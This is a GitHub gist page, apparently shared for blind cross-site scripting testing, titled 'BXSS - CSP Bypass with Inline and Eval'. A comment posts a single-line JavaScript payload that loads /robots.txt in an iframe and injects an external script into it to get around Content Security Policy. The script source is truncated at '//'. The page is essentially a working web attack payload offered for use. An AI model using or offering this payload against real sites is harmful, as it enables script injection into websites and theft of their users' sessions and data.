Skip to content

Instantly share code, notes, and snippets.

Last active March 6, 2022 16:20
  • Star 18 You must be signed in to star a gist
  • Fork 7 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?
BXSS - CSP Bypass with Inline and Eval
Copy link

Bo0oM commented Sep 3, 2018

d=document;f=d.createElement("iframe");f.src="/robots.txt";f.onload=_=>f.contentWindow.document.head.append(s);d.body.append(f);s=d.createElement("script");s.src="//"; :)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment